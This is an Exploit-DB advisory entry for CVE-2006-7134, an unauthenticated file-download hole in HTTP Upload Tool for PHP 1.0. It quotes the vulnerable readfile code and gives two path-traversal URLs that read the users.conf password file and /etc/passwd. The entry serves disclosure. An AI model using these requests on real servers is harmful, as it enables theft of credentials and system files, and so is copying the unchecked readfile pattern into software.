HTTP Upload Tool - 'download.php' Information Disclosure

Author: Craig Heffner
type: webapps
platform: php
port: 
date_added: 2006-11-15 
date_updated: 2016-09-16 
verified: 1 
codes: CVE-2006-7134 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comupload.tar.gz

#######################################################################################
# Target:
#
#       HTTP Upload Tool For PHP 1.0
#       http://uploadtool.sourceforge.net/
#
# Vulnerability:
#
#       Information disclosure
#
# Description:
#
#       The download.php file in Upload Tool for PHP neither verifies that a
#       requestor has authenticated, nor performs any sanity checking on the file
#       being requested. This allows an unauthenticated user to download any file
#       which the web server has read rights to, including the users.conf file which
#       contains a list of Upload Tool's users and their hashed passwords.
#
# Vulnerable Code (truncated):
#
#       $filename = $_GET['filename'];
#       readfile("$filename");
#
# Exploit:
#
#       http://www.examplesite.com/upload/bin/download.php?filename=../conf/users.conf
#       http://www.examplesite.com/upload/bin/download.php?filename=/etc/passwd
#
# Discovered:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
#######################################################################################

# milw0rm.com [2006-11-16]